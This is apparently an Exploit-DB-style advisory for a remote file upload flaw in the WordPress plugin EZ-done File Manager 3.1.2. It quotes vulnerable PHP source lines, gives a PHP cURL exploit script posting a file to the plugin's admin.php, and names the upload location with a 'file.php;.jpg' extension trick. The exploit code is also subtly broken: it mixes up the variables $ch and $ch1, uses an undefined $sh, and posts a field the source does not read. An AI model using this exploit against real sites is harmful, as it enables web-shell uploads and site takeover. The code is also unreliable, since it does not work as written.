* Exploit Title: Wordpress EZ-done File Manager 3.1.2 - Remote File Upload
* Google Dork: N/A
* Date: 2020.10.28
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/
* Software Link: https://wordpress.org/plugins/ez-done-file-manager/
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source:
379: move_uploaded_file move_uploaded_file($tmp_filepath, $target))
375: $tmp_filepath = $_FILES['file']['tmp_name'];
378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']);
352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target;
351: $upload_dir = wp_upload_dir();
349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING);
367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name']));
Exploit:
<?php
$ch="file.jpg";
$ch1 = curl_init("http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$sh"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg